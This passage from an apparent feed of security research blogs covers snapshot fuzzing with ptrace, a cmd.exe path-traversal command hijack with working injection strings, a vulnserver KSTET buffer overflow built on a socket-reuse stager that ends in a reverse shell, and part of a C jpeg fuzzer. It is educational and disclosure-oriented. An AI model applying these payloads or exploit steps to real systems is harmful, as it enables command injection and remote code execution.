    remote[4].iov_len = 0x1000;
    remote[5].iov_base = (void*)0x7ffff7ffe000;
    remote[5].iov_len = 0x1000;
    remote[6].iov_base = (void*)0x7ffffffde000;
    remote[6].iov_len = 0x21000;
 
    bytes_written = process_vm_writev(child_pid, local, 7, remote, 7, 0);
    //printf("dragonfly> %ld bytes written\n", bytes_written);
}

So for 7 different writable sections, we’ll write into the debuggee process at the offsets defined in /proc/$pid/maps from our snapshot_buf that has the pristine snapshot data. AND IT WILL BE FAST!

So now that we have the ability to restore the writable memory, we’ll only need to restore the register states now and we’ll be able to complete our rudimentary snapshot mechanism. That is easy using our ptrace_helpers defined functions and you can see the two function calls within the fuzzing loop as follows:

// restore writable memory from /proc/$pid/maps to its state at Start
restore_snapshot(snapshot_buf, child_pid);

// restore registers to their state at Start
set_regs(child_pid, snapshot_registers);

So that’s how our snapshot process works and in my testing, we achieved about a 20-30x speed-up over the dumb fuzzer!

Making our Dumb Fuzzer Smart

At this point, we still have a dumb fuzzer (albeit much faster now). We need to be able to track code coverage. A very simple way to do this would be to place a breakpoint at every ‘basic block’ between check_one and exit so that if we reach new code, a breakpoint will be reached and we can do_something() there.

This is exactly what I did except for simplicity sake, I just placed ‘dynamic’ (code coverage) breakpoints at the entry points to check_two and check_three. When a ‘dynamic’ breakpoint is reached, we save the input that reached the code into an array of char pointers called the ‘corpus’ and we can now start mutating those saved inputs instead of just our ‘prototype’ input of Canon_40D.jpg.

So our code coverage feedback mechanism will work like this:

Mutate prototype input and insert the fuzzcase into the heap
Resume debuggee
If ‘dynamic breakpoint’ reached, save input into corpus
If corpus > 0, randomly pick an input from the corpus or the prototype and repeat from step 1

We also have to remove the dynamic breakpoint so that we stop breaking on it. Good thing we already know how to do this well!

As you may remember from the last post, code coverage is crucial to our ability to crash this test binary vuln as it performs 3 byte comparisons that all must pass before it crashes. We determined mathematically last post that our chances of passing the first check is about 1 in 13 thousand and our chances of passing the first two checks is about 1 in 170 million. Because we’re saving input off that passes check_one and mutating it further, we can reduce the probability of passing check_two down to something close to the 1 in 13 thousand figure. This also applies to inputs that then pass check_two and we can therefore reach and pass check_three with ease.

Running The Fuzzer

The first stage of our fuzzer, which collects snapshot data and sets ‘dynamic breakpoints’ for code coverage, completes very quickly even though its not meant to be fast. This is because all the values are hardcoded since our target is extremely simple. In a complex multi-threaded target we would need some way to script the discovery of dynamic breakpoint addresses via Ghidra or objdump or something and we’d need to have that script write a configuration file for our fuzzer, but that’s far off. For now, for a POC, this works fine.

h0mbre@pwn:~/fuzzing/dragonfly_dir$ ./dragonfly 

dragonfly> debuggee pid: 12156
dragonfly> setting 'start/end' breakpoints:

   start-> 0x555555554b41
   end  -> 0x5555555548c0

dragonfly> set dynamic breakpoints: 

           0x555555554b7d
           0x555555554bb9

dragonfly> collecting snapshot data
dragonfly> snapshot collection complete
dragonfly> press any key to start fuzzing!

You can see that the fuzzer helpfully displays the ‘start’ and ‘end’ breakpoints as well as lists the ‘dynamic breakpoints’ for us so that we can check to see that they are correct before fuzzing. The fuzzer pauses and waits for us to press any key to start fuzzing. We can also see that the snapshot data collection has completed successfully so now we are broken on ‘start’ and have all the data we need to start fuzzing.

Once we press enter, we get a statistics output that shows us how the fuzzing is going:

dragonfly> stats (target:vuln, pid:12156)

fc/s       : 41720
crashes    : 5
iterations : 0.3m
coverage   : 2/2 (%100.00)

As you can see, it found both ‘dynamic breakpoints’ almost instantly and is currently running about 41k fuzzing iterations per second of CPU time (about 20-30x faster in wall time than our dumb fuzzer).

Most importantly, you can see that we were able to crash the binary 5 times already in just 300k iterations! We could’ve never done this with our previous fuzzer.

vv CLICK THIS TO WATCH IT IN ACTION vv

Conclusion

One of the biggest takeaways for me from doing this was just how much more performance you can squeeze out of a fuzzer if you just customize it for your target. Using out of the box frameworks like AFL is great and they are incredibly impressive tools, I hope this fuzzer will one day grow into something comparable. We were able to run about 20-30x faster than AFL for this really simple target and were able to crash it almost instantly with just a little bit of reverse engineering and customization. I thought this was really neat and instructive. In the future, when I adapt this fuzzer for a real target, I should be able to outperform frameworks again.

Ideas for Improvment

Where to begin? We have a lot of areas where we can improve but some immediate improvements that can be made are:

optimize performance by refactoring code, changing location of global variables
enabling the dynamic configuration of the fuzzer via a config file that can be created via a Python script
implementing more mutation methods
implementing more code coverage mechanisms
developing the fuzzer so that many instances can run in parallel and share discovered inputs/coverage data

Perhaps we will see these improvements in a subsequent post and the results of fuzzing a real target with the same general approach. Until then!

Code

All of the code for this blogpost can be found here: https://github.com/h0mbre/Fuzzing/tree/master/Caveman4

HACKINGISCOOL
Cmd Hijack - a command/argument confusion with path traversal in cmd.exeJulian Horoszkiewicz
10 June 2020 at 05:43

Cmd Hijack - a command/argument confusion with path traversal in cmd.exe

HACKINGISCOOL

By: Julian Horoszkiewicz

10 June 2020 at 05:43

This one is about an interesting behavior 🤭 I identified in cmd.exe in result of many weeks of intermittent (private time, every now and then) research in pursuit of some new OS Command Injection attack vectors.

So I was mostly trying to:

find an encoding missmatch between some command check/sanitization code and the rest of the program, allowing to smuggle the ASCII version of the existing command separators in the second byte of a wide char (for a moment I believed I had it in the StripQuotes function - I was wrong ¯\(ツ)/¯),
discover some hidden cmd.exe's counterpart of the unix shells' backtick operator,
find a command separator alternative to |, & and \n - which long ago resulted in the discovery of an interesting and still alive, but very rarely occurring vulnerability - https://vuldb.com/?id.93602.

And I eventually ended up finding a command/argument confusion with path traversal ... or whatever the fuck this is 😃

For the lazy with no patience to read the whole thing, here comes the magic trick:

Tested on Windows 10 Pro x64 (Microsoft Windows [Version 10.0.18363.836]), cmd.exe version: 10.0.18362.449 (SHA256: FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5). But should work with earlier versions as well... probably with all versions.

Some more context

Let's consider the following command line: cmd.exe /c "ping 127.0.0.1",
whereas 127.0.0.1 is the argument controlled by the user in an application that runs an external command (in this sample case it's ping). This exact syntax - with the command being preceded with the /c switch and enclosed in double quotes - is the default way cmd.exe is used by external programs to execute system commands (e.g. PHP shell_exec() function and its variants).

Now, the user can trick cmd.exe into running calc.exe instead of ping.exe by providing an argument like 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe, traversing the path to the executable of their choice, which cmd.exe will run instead of the ping.exe binary.

So the full command line becomes:

cmd.exe /c "ping 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe"

The potential impact of this includes Denial of Service, Information Disclosure, Arbitrary Code Execution (depending on the target application and system).

Although I am fairly sure there are some other scenarios with OS command execution whereas a part of the command line comes from a different security context than the final command is executed with (Some services maybe? I haven't search myself yet) - anyway let's use a web application as an example.

Consider the following sample PHP code:

Due to the use of escapeshellcmd() it is not vulnerable to known command injection vectors (except for argument injection, but that's a slightly different story and does not allow RCE with the list of arguments ping.exe supports - no built-in execution arguments like find's -exec).

And I know, I know, some of you will point out that in this case escapeshellarg() should be used instead - and yup, you would be right, especially since putting the argument in quotes in fact prevents this behavior, as in such case cmd.exe properly identifies the command to run (ping.exe). The trick does not work when the argument is enclosed in single/double quotes.

Anyway - the use of escapeshellcmd() instead of escapeshellarg() is very common. Noticed that while - after finding and registering CVE-2020-12669, CVE-2020-12742 and CVE-2020-12743 ended up spending one more week running automated source code analysis scans against more open source projects and manually following up the results - using my old evil SCA tool for PHP. Also that's what made me fed up with PHP again quite quickly, forcing me to get back to cmd.exe only to let me finally discover what this blog post is mostly about.

I am fairly sure there are applications vulnerable to this (doing OS command injection sanity checks, but failing to prevent path traversal and enclose the argument in quotes).

Also, the notion of similar behavior in other command interpreters is also worth entertaining.

An extended POC

Normal use:

Abuse:

Now, this is what normal use looks like in Sysmon log (process creation event):

So basically the child process (ping.exe) is created with command line equal to the value enclosed between the double quotes preceded by the /c switch from the parent process (cmd.exe) command line.

Now, the same for the above ipconfig.exe hijack:

And it turns out we are not limited to executables located in directories present in %PATH%. We can traverse to any location on the same disk.

Also, we are not limited to the EXE extension, neither to the list of "executable" extensions contained in the %PATHEXT% variable (which by default is .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC - basically these are the extensions cmd.exe will try to add to the name of the command if no extension is provided, e.g. when ping is used instead of explicit ping.exe). cmd.exe runs stuff regardless to the extension, something I noticed long ago (https://twitter.com/julianpentest/status/1203386223227572224).

And one more thing - more additional arguments between the original command and the smuggled executable path can be added.

Let's see all of this combined.

For the demonstrative purposes, the following C program was compiled and linked into a PE executable (it simply prints out its own command line):

Copied the EXE into C:\xampp\tmp\cmd.png (consider this as an example of ANY location a malicious user could write a file).

Action:

So we just effectively achieved an equivalent of actual (exec, not just read) PE Local File Inclusion in an otherwise-safe PHP ping script.

But I don't think that our options end here.

The potential for extending this into a full RCE without chaining with file upload/control

I am certain it is also possible to turn this into an RCE even without the possibility of fully/partially controlling any file in the target file system and deliver the payload in the command line itself, thus creating a sort of polymorphic malicious command line payload.

When running the target executable, cmd.exe passes to it the entire part of the command line following the /c switch.

For instance:

cmd.exe /c "ping 127.0.0.1/../../../../../../../windows/system32/calc.exe"

executes c:\windows\system32\calc.exe with command line equal ping 127.0.0.1/../../../../../../../windows/system32/calc.exe.

And, as presented in the extended POC, it is possible to hijack the executable even when providing multiple arguments, leading to command lines like:

ping THE PLACE FOR THE RCE PAYLOAD ARGS 127.0.0.1/../../path/to/lol.bin

This is the command line lol.bin would be executed with. Finding a proxy execution LOLBin tolerant enough to invalid arguments (since we as attackers cannot fully control them) could turn this into a full RCE.
The LOLBin we need is one accepting/ignoring the first argument (which is the hardcoded command we cannot control, in our example "ping"), while also willing to accept/ignore the last one (which is the traversed path to itself). Something like https://lolbas-project.github.io/lolbas/Binaries/Ieexec/, but actually accepting multiple arguments while quietly ignoring the incorrect ones.

Also, I was thinking of powershell.

Running this:

cmd.exe /c "ping ;calc.exe; 127.0.0.1/../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/POWERSHELL.EXE"

makes powershell start with command line of

ping ;calc.exe 127.0.0.1/../../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/POWERSHELL.EXE

I expected it to treat the command line as a string of inline commands and run calc.exe after running ping.exe. Yes, I know, a semicolon is used here to separate ping from calc - but the semicolon character is NOT a command separator in cmd.exe, while it is in powershell (on the other hand almost all OS Command Injection filters block it anyway, as they are written universally with multiple platforms in mind - cause obviously the semicolon IS a command separator in unix shells).

A perfect supported syntax here would be some sort of simple base64-encoded code injection like powershell's -EncodedCommand, having found a way to make it work even when preceded with a string we cannot control. Anyway, this attempt led to powershell running in interactive mode instead of treating the command line as a sequence of inline commands to execute.

Anyway, at this point turning this into an RCE boils down to researching the behaviors of particular LOLbins, focusing on the way they process their command line, rather than researching cmd.exe itself (although yes, I also thought about self-chaining and abusing cmd.exe as the LOLbin for this, in hope for taking advantage of some nuances between the way it parses its command line when it does and when it does not start with the /c switch).

Stumbling upon and some analysis

I know this looks silly enough to suggest I found it while ramming that sample PHP code over HTTP with Burp while watching Procmon with proper filters... or something like that (which isn't such a bad idea by the way)... as opposed to writing a custom cmd.exe fuzzer (no, you don't need to tell me my code is far away from elegant, I did not expect anyone would read it neither that I would reuse it), then after obtaining rather boring and disappointing results, spending weeks on static analysis with Ghidra (thanks NSA, I am literally in love with this tool), followed up with more weeks of further work with Ghidra while simultaneously manually debugging with x64dbg while further expanding comments in the Ghidra project 😂

cmd.exe command line processing starts in the CheckSwitches function (which gets called from Init, which itself gets called from main). CheckSwitches is responsible for determining what switches (like /c, /k, /v:on etc.) cmd.exe was called with. The full list of options can be found in cmd.exe /? help (which by the way, to my surprise, reflects the actual functionality pretty well).

I spent a good deal of time analyzing it carefully, looking for hidden switches, logic issues allowing to smuggle multiple switches via the command line by jumping out of the double quotes, quote-stripping issues and whatever else would just manifest to me as I dug in.

The beginning of the CheckSwitches function after some naming editions and notes I took

If the /c switch is detected, processing moves to the actual command line enclosed in double quotes - which is the most common mode cmd.exe is used and the only one the rest of this write-up is about:

The same mode can be attained with the /r switch:

After some further logic, doing, among other things, parsing the quoted string and making some sanity fixes (like removing any spaces if any found from its beginning), a function with a very encouraging and self-explanatory name is called:

Disassembly view:

Decompiler view:

At this point it was clear it was high time for debugging to come into play.

By default x64dbg will set up a breakpoint at the entry point - mainCRTStartup.

This is a good opportunity to set an arbitrary command line:

Then start cmd.exe once again (Debug-> Restart).

We also set up a breakpoint on the top of the SearchForExecutable function, so we catch all its instances.

We run into the first instance of SearchForExecutable:

We can see that the double-quoted proper command line (after cmd.exe skips the preceding cmd.exe /c) along with its double quotes is held in RBX and R15. Also, the value on the top of the stack (right bottom corner) contains an address pointing at CheckSwitches - it's the saved RET. So we know this instance is called from CheckSwitches.

If we hit F9 again, we will run into the second instance of SearchForExecutable, but this time the command line string is held in RAX, RDI and R11, while the call originates from another function named ECWork:

This second instance resolves and returns the full path to ping.exe.

Below we can see the body of the ECWork function, with a call to SearchForExecutable (marked black). This is where the RIP was at when the screenshot was taken - right before the second call of SearchForExecutable:

Now, on below screenshot the SearchForExecutable call already returned (note the full path to ping.exe pointed at with the address held in R14). Fifteen instructions later the ExecPgm function is called, using the newly resolved executable path to create the new process:

So - seeing SearchForExecutable being called against the whole ping 127.0.0.1 string (uh yeah, those evil spaces) suggests potential confusion between the full command line and an actual file name... So this gave me the initial idea to check whether the executable could be hijacked by literally creating one under a name equal to the command line that would make it run:

Uh really? Interesting. I decided to have a look with Procmon in order to see what file names cmd.exe attempts to open with CreateFile:

So yes, the result confirmed opening a copy of calc.exe from the file literally named ping .PNG in the current working directory:

Now, interestingly, I would not see any results with this Procmon filter (Operation = CreateFile) if I did not create the file first...

One would expect to see cmd.exe mindlessly calling CreateFile against nonexistent files with names being various mutations of the command line, with NAME NOT FOUND result - the usual way one would search for potential DLL side loading issues... But NOT in this case - cmd.exe actually checks whether such file exists before calling CreateFile, by calling QueryDirectory instead:

For this purpose, in Procmon, it is more accurate to specify a filter based on the payload's unique magic string (like PNG in this case, as this would be the string we as attackers could potentially control) occurring in the Path property instead of filtering based on the Operation.

"So, anyway, this isn't very useful" - I thought and got back to x64dbg.

"We can only hijack the command if we can literally write a file under a very dodgy name into the target application's current directory... " - I kept thinking - "... Current directory... u sure ONLY current directory?" - and at this point my path traversal reflex lit up, a seemingly crazy and desperate idea to attempt traversal payloads against parts of the command line parsed by SearchForExecutable.

Which made me manually change the command line to ping 127.0.0.1/../calc.exe and restart debugging... while already thinking of modifying the cmd.exe fuzzer in order to throw a set payloads generated for this purpose with psychoPATH against cmd.exe... But that never happened because of what I saw after I hit F9 one more time.

Below we can see x64dbg with cmd.exe ran with cmd.exe /c "ping 127.0.0.1/../calc.exe" command line (see RDI). We are hanging right after the second SearchForExecutable call, the one originating from the bottom of the ECWork function. Just few instructions before calling ExecPgm, which is about to execute the PE pointed by R14. The full path to C:\Windows\System32\calc.exe present R14 is the result of the just-returned SearchForExecutable("ping 127.0.0.1/../calc.exe") call preceding the current RIP:

The traversal appears to be relative to a subdirectory of the current working directory (calc.exe is at c:\windows\system32\calc.exe):

"Or maybe this is just a result of a failed path traversal sanity check, only removing the first occurrence of ../?" - I kept wondering.

So I dug further into the SearchForExecutable function, also trying to find the answer why variants of the argument created by splitting it by spaces are considered and why the most-to-the-right one is chosen first when found.

I narrowed down the culprit code to the instructions within the SearchForExecutable function, between the call of mystrcspn at 14000ff64 and then the call of the FullPath function at 14001005b and exists_ex at 140010414:

In the meantime I received the following feedback from Microsoft:

We do have a blog post that helps describe the behavior you have documented: https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats.

Cmd.exe first tries to interpret the whole string as a path: "ping 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe” string is being treated as a relative path, so “ping 127.0.0.1” is interpreted as a segment in that path, and is removed due to the preceding “../” this should help explain why you shouldn’t be able to use the user controlled input string to pass arguments to the executable.

There are a lot a cases that would require that behaviour, e.g. cmd.exe /c "....\Program Files (x86)\Internet Explorer\iexplore.exe" we wouldn’t want that to try to run some program “....\Program” with the argument “Files (x86)\Internet Explorer\iexplore.exe”.

It’s only if the full string can’t be resolved to a valid path, that it splits on spaces and takes everything before the first space as the intended executable name (hence why “ping 127.0.0.1” does work).

So yeah... those evil spaces and quoting.

From this point, I only escalated the issue by confirming the possibility of traversing to arbitrary directories as well as the ability to force execution of PE files with arbitrary extensions.

Interestingly, this slightly resembles the common unquoted service path issue, except that in this case the most-to-the-right variant gets prioritized.

The disclosure

Upon discovery I documented and reported this peculiarity to MSRC. After little less than six days the report was picked up and reviewed. About a week later Microsoft completed their assessment, concluding that this does not meet the bar for security servicing:

On one hand, I was little disappointed that Microsoft would not address it and I was not getting the CVE in cmd.exe I have wanted for some time.

On the other hand, at least nothing's holding me back from sharing it already and hopefully it will be around for some time so we can play with it 😃 It's not a vulnerability, it's a technique 😃

I would like thank Microsoft for making all of this possible - and for being nice enough to even offer me a review of this post! Which was completely unexpected, but obviously highly appreciated.

Some reflections

Researching stuff can sometimes appear to be a lonely and thankless journey, especially after days and weeks of seemingly fruitless drudging and sculpturing - but I realized this is just a short-sighted perception, whereas success is exclusively measured by the number of uncovered vulnerabilities/features/interesting behaviors (no point to argue about the terminology here 😃). In offensive security we rarely pay attention to the stuff we tried and failed, even though those failed attempts are equally important - as if we did not try, we would never know what's there (and risk false negatives). Curiosity and the need to know. And software is full of surprises.

Plus, simply dealing with a particular subject (like analyzing a given program/protocol/format) and gradually getting more and more familiar with it feeds our minds with new mental models, which makes us automatically come up with more and more ideas for potential bugs, scenarios and weird behaviors as we keep hacking. A journey through code accompanied by new inspirations, awarded with new knowledge and the peace of mind resulting from answering questions... sometimes ending with great satisfaction from a unique discovery.

APC Series: User APC Internals

Low Level Pleasure

2 June 2020 at 21:00

Hey! This is the second part of the APC Series, If you haven’t read it I recommend you to read the first post about User APC API. where I explore the internals of APC objects in Windows. In this part I’ll explain: How to queue user APCs from kernel mode? How user APCs are implemented in the windows kernel? How user APCs are delivered to user mode? In this blog I won’t cover the internals of Special User APCs, because Special User APCs rely on Kernel APC to perform their operation - I’ll explore this type in a future post after I explain about Kernel APCs.

Multi-Stage EIP redirection Buffer Overflow -- Win API / Socket Reuse

Pyt3ra Security Blogs

By: Ymir F. Eboras | OSCE | OSCP | SLAE| MS. Comp Science

2 June 2020 at 19:26

Kali Linux

Windows Vista

Vulnerable application: vulnserver.exe (KSTET)

Vulnserver.exe is meant to be exploited mainly with buffer overflows vulnerabilities. More info about this application and where to download it can be found here:

http://www.thegreycorner.com/2010/12/introducing-vulnserver.html

//*****//

We get the initial crash using the following fuzzer.

...and we get a pretty vanilla EIP overwrite buffer overflow.

Calculating the offset as usual using Metasploit's pattern_offset.rb and pattern_create.rb

We have our offset value so at this point we will need to find JMP ESP address and redirect EIP to it. We will use address 0x625011AF.

Note that you can use Immunity Debugger's mona.py or just search it manually.

Updated POC with the offset value and JMP ESP address.

As we examine the crash in Immunity Debugger, we can see the correct offset value and hit our JMP ESP address however, once the jump is taken, our Cs have been truncated. As a result, this only gives us a space of about 20 bytes.

That said, we will use the C buffer space to do a reverse jmp to A's address space which allowed for roughly about 66 bytes of address space.

Reverse jump EB B8 and will jump as from address 0x00D0F9E0 to 0x00D0F99A

We update and send our exploit...then take the jump.

Once again, we examine the crash and see that we have successfully landed on A's address space.

Now the fun part begins..thanks to https://purpl3f0xsec.tech/2019/09/04/Vulnserver-KSTET-Socket-Reuse.html for pointing out this type of vector.

Stolen from purpl3f0xsec...the diagram below shows how the socket connection is established between the client and the vulnserver.

Basically, we will utilize (reuse) the recv() function call. The idea is to utilize the established socket() connection and use the recv() as the first stage payload. Once the recv() function is up and running, we will then send our second stage payload.

The second stage payload will not overflow the buffer so it will not get truncated.

More information about the recv() can be found here: https://docs.microsoft.com/en-us/windows/win32/api/winsock/nf-winsock-recv

To set up recv(), we need the following parameters.

Socket = socket descriptor

Buffer = memory location for our second stage payload

BufferSize = memory space allocation for our second stage payload

Flags = Socket flags…can be set to Null

These are the parameters will need to be pushed to the stack (don't forget reverse order).

Before I populated the parameters, I grabbed the address of recv() which can be done by going in to the .text entry point and if we scroll down, we will find the functions.

Address 0x00401953 has the recv() but if you double click it...it shows the actual address which is 0x0040252C

I set a breakpoint at address 0x0040252C.

Once we hit our breakpoint, if you look at the stack, we can see the parameters that are currently loaded in the stack.

Note that at this point...both EAX and EBX registers have the socket descriptor value of 0x00000050. This is because of the instructions at these addresses: 0x0040194A and 0x00401950

0x0040194A - MOV EAX, DWORD PTR SS: [EBP-420]

This is a pointer to [EBP-420] so whatever the value loaded in [EBP-420] gets mov into EAX

We can see that EBP currently points to address 0x00EEFF88 so subtracting 420 should get us to the address that holds the socket descriptor.

As expected, if we jump to address 0x00EEFB68...we can see the value 0x00000050 loaded in.

Now, address 0x00401950 has the following instructions..

0x00401950 - MOV DWORD PTR SS:[ESP], EAX

This basically just loads the socket descriptor value stored in EAX, to the the [ESP] pointer. We can verify this by following ESP in the stack which currently points to address 0x011CF9E0

Next, we will load the value of socket descriptor to EAX. ASLR is enabled we will to do some math and ee will use ESP's address as a reference point.

We know that EBP register holds the socket descriptor located at address 0x00EEFB68. This means that we will need to do following:

0x00EEFB68 (EBP) - 0x00EEF9E0 (ESP) = 188 (in hex)

Great..so we will need to add 188 to ESP. We will do this by pushing ESP into stack, and pop it to EAX then add 188 to EAX. If our calculation is correct, we should have the socket descriptor address (0x00EEFB68) loaded to EAX.

We run the following instuctions:

PUSH ESP

POP EAX

ADD AX, 188

And we can see that address 00EEFB68 is now loaded in EAX which contains the socket descriptor value of 0x00000050 as shown in the stack.

Great...now we have the socket descriptor easily accessible!

Re-aligning ESP

At this point, we will have to re-align ESP so that we don't arbitrarily overlap with our first stage instructions. As we push more instructions to the stack, especially in a small address space, we risk overlaping our first stage with ESP.

That said, we need to move our ESP below where our first stage will be loaded.

We use the following instructions to adjust ESP:

SUB ESP, 6C ;SUB 108 from ESP

This makes ESP points to 0x00EEF974

***Note that towards the end of the exploit development, I found that ESP needed to point directly below the recv() parameters. That meant I had to adjust ESP and only subtracted 64 which pointed it to address 0x00EEF97C instead.

At this point, we have accomplished the following:

1. Located the address for the recv() function

2. Located the address that holds the socket descriptor value

3. Loaded the socket descriptor value to EAX

4. Aligned the stack to ensure our first stage does not overlap with ESP

Now we are ready to populate the parameters for our recv() function call.

Note that we need 4 parameters for the this function call pushed to the stack in reverse order.

0x1 - Param #4 (Flags)

Since we are not setting any flags, we will set this parameter to NULL.

Using the EBX register...we zero it out using XOR instruction before pushing it to the stack

XOR, EBX, EBX

PUSH EBX

0x2 - Param #3 (Buffer Size)

For the buffer size, I picked about 1024 bytes of buffer space which is a lot more than what we need.

Utilizing the EBX register again which is already set to zero...we will add 400 (in hex) to it.

ADD BH, 4

PUSH EBX

0x3 - Param # 2 (Buffer Location)

I initialy pointed the buffer location to beginning of the Cs (0x00EEF9E4), however, it didn't work so I had to point it directly right after the four parameters. In this case, the buffer location has to be pointed to address 0x00EEF97C

We can use the ESP address again...load the address into EBX then do some math which in this case I had to add 120 to ESP (HEX 78)

PUSH ESP

POP EBX

ADD EBX, 78

PUSH EBX

0x4 - Param #1 (Socket Descriptor)

Finally, for the socket descriptor we will need to access the value currently stored in EAX (not EAX address itself)

EAX is still pointing to 0x00EEFB68 that holds the socket descriptor value of 0x00000050

We can simply push the value stored in EAX using the following instruction:

PUSH DWORD PTR DS:[EAX]

...and we are done with the parameters.

At this point, we should have the following parameters.

Socket descriptor = 0x00000050

Buffer location = beginning of our C's (NOTE: this was adjusted to address 0x00EEF97C)

Buffer size = 400 (1024 in dec)

Flags = 0

Calling the RECV()

With the parameters set, we are now ready to call our RECV() function. Note that RECV() function is at adddress 0x0040252C

As you can see the recv() address contains null bytes which we will need to be removed. I learned something new from https://purpl3f0xsec.tech/2019/09/04/Vulnserver-KSTET-Socket-Reuse.html as to how to remove these null bytes.

We simply use an arbitrary address such as removing the null bytes and adding 90 for the lowest byte: 0x40252C90 instead of 0x0040252C

So we move this arbitrary address to EAX:

MOV EAX, 40252C90

Then we shift to right by 8 bits which removes the last 8 bits (0x90) and adds 00 to the first 8 bits

SHR EAX, 8

Finally, we simply CALL EAX

Here just right before we execute CALL EAX, we can see that it currently points to the recv() address

That is the entire first stage...and we update our POC as shown below

We fire up the exploit one more, step through the stager, and we can see that we have all 4 parameters ready to go…they are followed with the address of where our payload will be loaded.

Second Stage / Reverse Shell

With our RECV() function ready, we can send our second stage payload.

We update our POC and see if we can add the Ds to memory.

Noe that I added a sleep(5) in between first and second stage. This ensures that our RECV() fucntion is ready before we send the second stage payload.

Here we can see that we have successfully loaded our Ds to memory at address 0x011EFD7C or 0x00EEFD7C (note ASLR).

We then replace the Ds with an actual reverse shell, fire up the exploit, and we get a reverse shell!

Thank you for reading.

The Human Machine Interface
Fuzzing Like A Caveman 3: Trying to Somewhat Understand The Importance Code Coverageh0mbre
26 May 2020 at 04:00

Fuzzing Like A Caveman 3: Trying to Somewhat Understand The Importance Code Coverage

The Human Machine Interface

By: h0mbre

26 May 2020 at 04:00

Introduction

In this episode of ‘Fuzzing like a Caveman’, we’ll be continuing on our by noob for noobs fuzzing journey and trying to wrap our little baby fuzzing brains around the concept of code coverage and why its so important. As far as I know, code coverage is, at a high-level, the attempt made by fuzzers to track/increase how much of the target application’s code is reached by the fuzzer’s inputs. The idea being that the more code your fuzzer inputs reach, the greater the attack surface, the more comprehensive your testing is, and other big brain stuff that I don’t understand yet.

I’ve been working on my pwn skills, but taking short breaks for sanity to write some C and watch some @gamozolabs streams. @gamozolabs broke down the importance of code coverage during one of these streams, and I cannot for the life of me track down the clip, but I remembered it vaguely enough to set up some test cases just for my own testing to demonstrate why “dumb” fuzzers are so disadvantaged compared to code-coverage-guided fuzzers. Get ready for some (probably incorrect 🤣) 8th grade probability theory. By the end of this blog post, we should be able to at least understand, broadly, how state of the art fuzzers worked in 1990.

Our Fuzzer

We have this beautiful, error free, perfectly written, single-threaded jpeg mutation fuzzer that we’ve ported to C from our previous blog posts and tweaked a bit for the purposes of our experiments here.

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h> 
#include <fcntl.h>

int crashes = 0;

struct ORIGINAL_FILE {
    char * data;
    size_t length;
};

struct ORIGINAL_FILE get_data(char* fuzz_target) {

    FILE *fileptr;
    char *clone_data;
    long filelen;

    // open file in binary read mode
    // jump to end of file, get length
    // reset pointer to beginning of file
    fileptr = fopen(fuzz_target, "rb");
    if (fileptr == NULL) {
        printf("[!] Unable to open fuzz target, exiting...\n");
        exit(1);
    }
    fseek(fileptr, 0, SEEK_END);
    filelen = ftell(fileptr);
    rewind(fileptr);

    // cast malloc as char ptr
    // ptr offset * sizeof char = data in .jpeg
    clone_data = (char *)malloc(filelen * sizeof(char));

    // get length for struct returned
    size_t length = filelen * sizeof(char);

    // read in the data
    fread(clone_data, filelen, 1, fileptr);
    fclose(fileptr);

    struct ORIGINAL_FILE original_file;
    original_file.data = clone_data;
    original_file.length = length;

    return original_file;
}

void create_new(struct ORIGINAL_FILE original_file, size_t mutations) {

    //
    //----------------MUTATE THE BITS-------------------------
    //
    int* picked_indexes = (int*)malloc(sizeof(int)*mutations);
    for (int i = 0; i < (int)mutations; i++) {
        picked_indexes[i] = rand() % original_file.length;
    }

    char * mutated_data = (char*)malloc(original_file.length);
    memcpy(mutated_data, original_file.data, original_file.length);

    for (int i = 0; i < (int)mutations; i++) {
        char current = mutated_data[picked_indexes[i]];

        // figure out what bit to flip in this 'decimal' byte
        int rand_byte = rand() % 256;
        
        mutated_data[picked_indexes[i]] = (char)rand_byte;
    }

    //
    //---------WRITING THE MUTATED BITS TO NEW FILE-----------
    //
    FILE *fileptr;
    fileptr = fopen("mutated.jpeg", "wb");
    if (fileptr == NULL) {
        printf("[!] Unable to open mutated.jpeg, exiting...\n");
        exit(1);
    }
    // buffer to be written from,
    // size in bytes of elements,
    // how many elements,
    // where to stream the output to :)
    fwrite(mutated_data, 1, original_file.length, fileptr);
    fclose(fileptr);
    free(mutated_data);
    free(picked_indexes);
}

void exif(int iteration) {
    
    //fileptr = popen("exiv2 pr -v mutated.jpeg >/dev/null 2>&1", "r");
    char* file = "vuln";
    char* argv[3];
    argv[0] = "vuln";
    argv[1] = "mutated.jpeg";
    argv[2] = NULL;
    pid_t child_pid;
    int child_status;

    child_pid = fork();
    if (child_pid == 0) {
        
        // this means we're the child process
        int fd = open("/dev/null", O_WRONLY);

        // dup both stdout and stderr and send them to /dev/null
        dup2(fd, 1);
        dup2(fd, 2);
        close(fd);
        

        execvp(file, argv);
        // shouldn't return, if it does, we have an error with the command
        printf("[!] Unknown command for execvp, exiting...\n");
        exit(1);
    }
    else {
        // this is run by the parent process
        do {
            pid_t tpid = waitpid(child_pid, &child_status, WUNTRACED |
             WCONTINUED);
            if (tpid == -1) {
                printf("[!] Waitpid failed!\n");
                perror("waitpid");
            }
            if (WIFEXITED(child_status)) {
                //printf("WIFEXITED: Exit Status: %d\n", WEXITSTATUS(child_status));
            } else if (WIFSIGNALED(child_status)) {
                crashes++;
                int exit_status = WTERMSIG(child_status);
                printf("\r[>] Crashes: %d", crashes);
                fflush(stdout);
                char command[50];
                sprintf(command, "cp mutated.jpeg ccrashes/%d.%d", iteration, 
                exit_status);
                system(command);
            } else if (WIFSTOPPED(child_status)) {
                printf("WIFSTOPPED: Exit Status: %d\n", WSTOPSIG(child_status));
            } else if (WIFCONTINUED(child_status)) {
                printf("WIFCONTINUED: Exit Status: Continued.\n");
            }
        } while (!WIFEXITED(child_status) && !WIFSIGNALED(child_status));
    }
}

int main(int argc, char** argv) {

    if (argc < 3) {
        printf("Usage: ./cfuzz <valid jpeg> <num of fuzz iterations>\n");
